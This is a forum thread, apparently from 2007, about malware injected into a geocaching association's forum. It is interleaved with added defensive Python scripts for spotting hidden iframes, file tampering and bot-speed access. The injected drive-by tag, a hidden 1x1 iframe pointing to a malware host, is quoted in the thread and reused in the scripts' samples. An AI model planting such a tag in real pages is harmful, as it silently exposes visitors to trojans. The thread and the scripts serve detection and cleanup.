
GAGB spawning a virus?


TheRoundings


I see that the site link:

http:// www.gagb.org.uk/forum (note space included so as to break the link)

is spawning:

http:// zebxmzbsx.biz/dll/adv631.php (again space included so as to break the link)

which is calling an image called:

xpladv631[1].wmf

 

This is blocked by my browser and is not something related to just my computer. This happens on two colleagues' computers also.

 

Does anyone know what this is?

Is it a virus?

 

I am concerned to visit the forums again on the GAGB site until I know what this is.

 

Duncan

 

EDIT: Update - this image is seen as a Trojan by McAfee VirusScan in my virus scanning logs

Edited by TheRoundings

Initially I was at work. I've now got home and tried from here and the same occurs. If you're not quick you will not see it. It only happens with the first session of GAGB in your browser, or at least until the file is cached. Close your browser, open it again, then go to

http:// www.gagb.org.uk/forum.

 

After a short while the page is redirecting to

http:// www.gagb.lunarpages.com/forum/

which is normal, then after a short duration you can see a load from http:// zebxmzbsx.biz/dll/adv631.php

 

This happens only after opening your browser and navigating the first time.

 

Edit: This happens with FF2.0 and IE7.

Edited by TheRoundings

Yep, here's the offending code (line 247 of the index page):

 

<iframe src="http://zebxmzrbsx.biz/dl/adv631.php" width=1 height=1></iframe>

 

Looks to me like it's been hacked, though it's hardly surprising given the forum software is three years old and has a list of possible ways to attack it as long as your arm.

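The injected tag quoted above is a 1x1 iframe pointing at an unrelated domain, which is exactly the shape a defender can scan for. As an added example (not code from this thread or from the GAGB site), the following Python script parses a saved copy of a page, collects every iframe, and flags those that are hidden (1 pixel or less, or styled invisible) or whose src host is outside the site's own domain. The sample page is constructed for the example; it reuses the tag quoted in the thread and adds a placeholder host, `ads.example.invalid`, that is not from the original post.

```python
"""Scan a saved HTML page for iframes that are hidden (1x1, display:none) or
point off-site, the pattern of the tag injected into the GAGB forum index page.
Added example, not the forum's own code."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # html.parser lower-cases attribute names; unquoted values (width=1) arrive as "1"
            self.iframes.append({name: (value or "") for name, value in attrs})


def _pixels(value):
    """Return a numeric size for "1", "1px" or " 2 "; None for "100%" or blanks."""
    text = value.strip().lower()
    if text.endswith("px"):
        text = text[:-2]
    try:
        return float(text)
    except ValueError:
        return None


def is_hidden(attrs):
    """True when the frame is too small to see or is styled invisible."""
    width = _pixels(attrs.get("width", ""))
    height = _pixels(attrs.get("height", ""))
    if (width is not None and width <= 1) or (height is not None and height <= 1):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def is_offsite(src, site_host):
    """True when src resolves to a host outside site_host and its subdomains."""
    host = urlparse(src).hostname
    if not host:
        return False  # relative or empty src stays on the site
    return host != site_host and not host.endswith("." + site_host)


def find_suspicious_iframes(html, site_host):
    """Return [(src, [reasons...])] for every iframe that is hidden or off-site."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden")
        if is_offsite(src, site_host):
            reasons.append("off-site")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page: one legitimate same-site frame, the injected tag
# quoted in this thread, and an invisible frame to a placeholder host.
SAMPLE_HTML = """<html><body>
<h1>GAGB Forum</h1>
<iframe src="http://www.gagb.org.uk/forum/stats.php" width="300" height="120"></iframe>
<iframe src="http://zebxmzrbsx.biz/dl/adv631.php" width=1 height=1></iframe>
<iframe src="http://ads.example.invalid/x.php" style="display: none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_HTML, "www.gagb.org.uk"):
        print(f"{src}: {', '.join(reasons)}")
```

Run it against the HTML your own browser or `curl` saved rather than the live page, so that a second fetch does not itself trigger the redirect chain described earlier in the thread. The legitimate stats frame passes both checks; the two hidden off-site frames are reported with both reasons.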

We're aware of this. I'm quite au fait with the website, but Invision and MySQL aren't my line - I spent an age last night trying to find the problem, but with no success. Ian (Teasel), who's our webmaster, seems to be away at the moment and we can't get hold of him, so it looks as if we're stuck with this until he comes back.

 

If you're using an up-to-date AV program and a firewall this shouldn't be a problem. If you're not, you really should be.

 

---

Bill, Chairman GAGB


FF and IE were affected. It was nothing to do with the browser. Another page was automatically called after the main forum page which tried to load a Trojan Windows metafile image. The security settings in each browser could've restricted it; however, most people relax their settings for more convenient browsing. In this case it was an easy catch for anyone with up-to-date virus checking.


Sorry, never received any email, but opening up the database now...

 

Edit: ahh, only just realised how soon I happened to check the forum; the email was still flying through the interweb :blink:

 

Anyway: the injected code has been removed, and the most basic of inoculations included, but I can forward findings to hopefully plug the hole!

Edited by barryhunter

A couple of years ago, The Register (an online tech newsletter that I read most days) was hit by a "driveby". It was actually in their advertising, which is outsourced, but that's no comfort. Just by accessing the relevant advert(s) (which you had no choice in), an "iframe exploit" was installed on your computer (translation: a bunch of horrible stuff was installed on your computer), which was really, really difficult to remove (recommended method: reformat your disk and reinstall Windows).

 

It was after that that I decided that using Internet Explorer (and Outlook) was just too difficult for me, and I switched. Many people use the Firefox browser, which seems to suffer from fewer of such problems. I went the whole hog and dropped Windows in favour of Linux. This also means that I don't use (or, probably, need) an antivirus.

 

Another part of the problem is false alarms, such as this one:

 

http://news.com.com/Microsoft+flags+Gmail+..._3-6135154.html

 

Currently, I'm getting sent maybe a dozen viruses (or trojans, or, well, I don't care) per day in my email, and heaven knows what horriblenesses I'm accessing on the web, but it's all water off a geocacher's back, because they're all Windows-oriented.

 

Recommendation - check out Firefox, or any other browser that isn't Internet Explorer, because it's IE that the black hats are targeting.

 

Disclaimer - I no longer have any financial interest in any antivirus company.


Most of the nasties seem to be written in Javascript and will have a fighting chance of working on Firefox as well. However, their binary payloads won't work on Linux :anicute:

 

I've just been put in charge of the network security team at work and I'm reviewing our site filtering policies. Currently we have an ineffectual 7-year-old list of porn sites and we block assorted malware providers as we detect them. But I'm thinking of just blocking *.biz and seeing if anyone calls!


... I thought I had posted this about 12.30, but it got lost with the dodgy internet connection (it was still open in the text editor I use for spell checking) ...

 

Arrg! Gone again. Interestingly, it looks like it's a person manually cracking into it, as they adapted to get round the inoculation I applied. (It could be an automated virus breaking in, but the change is a definite shift in what was happening.) If I get a chance over the weekend I will have a look at the logs to see if I can spot how it's happening...

Edited by barryhunter

Get the forum software upgraded.

 

One entry point in php can give a cracker full access to the webserver it's hosted on.

 

I should also add that once someone has one access point they'll quite often add backdoors in. The best way to go is to make sure you have clean copies of the configuration and any template changes made, and do a reinstall; nasty stuff can hide in there.

Edited by Edgemaster
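The advice above, to reinstall from clean copies because "nasty stuff can hide in there", is easier to act on when you can list exactly which files differ from the clean install. As an added example, not code from this thread or from the Invision software, the following Python script hashes every file under a web root into a manifest, then reports files that were added, removed or modified relative to a manifest taken when the install was known clean. The `demo()` function builds a small constructed tree, records it, simulates the two changes discussed in this thread (the hidden iframe appended to the index page, and a stray file dropped into a cache directory) and returns the diff; the file names and contents are constructed for the example.

```python
"""Compare a web root against a manifest of known-good file hashes to find files
that were added, changed or removed since a clean install. Added example, not
the forum's or Invision's own code; the tree it builds is constructed."""
import hashlib
import pathlib
import tempfile


def hash_tree(root):
    """Map each file path (relative, POSIX style) under root to its SHA-256."""
    root = pathlib.Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def diff_against_manifest(root, baseline):
    """Return added / missing / modified paths relative to the known-good manifest."""
    current = hash_tree(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "missing": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
    }


def demo():
    """Build a tiny constructed forum tree, record it, tamper with it, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        (root / "forum").mkdir()
        (root / "forum" / "index.php").write_text("<?php echo 'forum'; ?>\n")
        (root / "forum" / "conf_global.php").write_text("<?php $INFO['sql_host'] = 'localhost'; ?>\n")
        baseline = hash_tree(root)  # taken while the install is known clean

        # Constructed tampering: the hidden iframe quoted in this thread appended
        # to the index page, and a stray file dropped in a writable cache directory.
        with open(root / "forum" / "index.php", "a") as fh:
            fh.write('<iframe src="http://zebxmzrbsx.biz/dl/adv631.php" width=1 height=1></iframe>\n')
        (root / "forum" / "cache").mkdir()
        (root / "forum" / "cache" / "x.php").write_text(
            "<?php /* constructed stand-in for a dropped file */ ?>\n"
        )

        return diff_against_manifest(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Keep the baseline manifest somewhere the web server cannot write to (a separate machine is best), since anyone who can edit index.php can also edit a manifest stored beside it. Legitimately writable directories such as caches and uploads will always show as "added"; the value is in the "modified" list covering files that should never change between upgrades.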

Yes - the new Intel ones can. I do it all the time and can run any Windows application on my Mac desktop without using an emulator :o.

 

I was just wondering, does the issue just affect IE users or does it affect Firefox too?

 

Can Mac run GSAK without a windows Emulator? :anibad:

 

Yes, you're running them without an emulator, but you're still having to use Windows (using Boot Camp or Parallels). This will still leave you open to viruses in your Windows applications, as it's the Mac OS X operating system that's safe, not the Windows install that's sitting on top of it.

 

The one plus point is that Parallels runs Windows in a virtual machine, so the virus will only affect the Windows install and not the complete Mac software.


It is at the moment... But any website is liable to get hacked, so make sure you're using an up-to-date antivirus program, and preferably a personal firewall too.

 

I use the free versions of Avast antivirus and Zone Labs firewall.

 

I continued to visit the GAGB forums during the periods the virus was there, and had no problems. I'm using Firefox, and I think FF stopped the link opening, as I accessed the forums on my sister's computer using IE and Avast stopped the virus. On mine Avast never got to see the virus as it didn't get to me at all.

 

Edit to add: And make sure your antivirus and firewall are updated regularly - I have Avast and Zonelabs set to check automatically for updates.

Edited by Bill D (wwh)

 

Doesn't sound very reassuring. I'll let MrsB go first and report if all is clear :laughing:

Edited by stora

:D Joking aside...Just went back to GAGB and once again McAfee is immediately giving me pop-ups of Trojans and potentially harmful scripts being removed. I've never come across this before on any of the other sites that I drop into. McAfee is obviously "doing its stuff" and protecting my pc but I'm not inclined to hang around on the site knowing that it's regularly being infected. I won't be back until I feel confident that it's been properly cleaned up. :P

 

MrsB :D


I visited the site tonight and my Anti-Virus went mad. Hmmm, judging by the speed and method that things are being re-inserted I wonder if the cause of it is reading this thread. Can you track some of the traffic? Surely this form of attack is manual, not bot? :P

I still remember the porn attacks this forum had recently - someone with a grudge?

Edited by Alice Band

It is removed, but as Bill mentioned, AV should be installed as par for the course (but a sad course of affairs!) anyway.

 

I should add that I have now been able to track at least one very suspicious access. It 'browsed' the site too quickly to be a real person; almost certainly a bot visiting.

I've blocked that computer and also installed tracking to get much more verbose info if it should happen again.

 

(Previously I'd been able to do little more than remove the naughty code each time, nothing to really stop it happening again, but now I've been able to learn about the GAGB website.)

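The check Barry describes, an address that walks the site faster than a person could, can be written down as a sliding-window count over the web server's access log. As an added example (not the forum's own tooling), the following Python script parses combined-format log lines, counts each address's requests within any ten-second window, and flags addresses at or above a threshold. The log lines are constructed inline for the example, using documentation address ranges rather than real visitors; the timestamps and paths are likewise made up.

```python
"""Flag client addresses that fetch pages faster than a person could, from
Apache/nginx combined-format access log lines. Added example, not the forum's
own tooling; the log lines below are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "time": when, "request": m.group("req"), "ua": m.group("ua")}


def peak_requests(times, window_seconds):
    """Largest number of requests falling inside any window of window_seconds."""
    queue = deque()
    peak = 0
    for t in sorted(times):
        queue.append(t)
        # drop requests that fell out of the window ending at t
        while (t - queue[0]).total_seconds() > window_seconds:
            queue.popleft()
        peak = max(peak, len(queue))
    return peak


def flag_fast_clients(lines, window_seconds=10, threshold=8):
    """Return {ip: peak} for every address with >= threshold requests in one window."""
    times_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            times_by_ip[rec["ip"]].append(rec["time"])
    flagged = {}
    for ip, times in times_by_ip.items():
        peak = peak_requests(times, window_seconds)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, second, path, ua):
    """Build one constructed combined-format line at 12:00:<second> on a made-up date."""
    return (f'{ip} - - [10/Feb/2007:12:00:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'200 512 "-" "{ua}"')


# Constructed sample: 198.51.100.7 walks twelve topic pages in twelve seconds,
# 203.0.113.5 reads three pages over fifty seconds. Both are documentation
# address ranges, not real visitors.
SAMPLE_LOG = (
    [_line("198.51.100.7", s, f"/forum/index.php?showtopic={s}", "Mozilla/4.0 (compatible)")
     for s in range(12)]
    + [_line("203.0.113.5", s, "/forum/index.php",
             "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0")
       for s in (0, 25, 50)]
)

if __name__ == "__main__":
    for ip, peak in flag_fast_clients(SAMPLE_LOG).items():
        print(f"{ip}: {peak} requests within 10 s")
```

The threshold needs tuning per site: a page that pulls in a dozen images and stylesheets will legitimately produce a burst from one address, so either count only page requests (filter `request` on `.php`) or raise the threshold. Blocking on the basis of this alone is a blunt tool; it is more useful as the trigger for the verbose logging Barry mentions installing.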

:D A well-done for all your hard work Barry. Hopefully this is the last we hear of it. :P
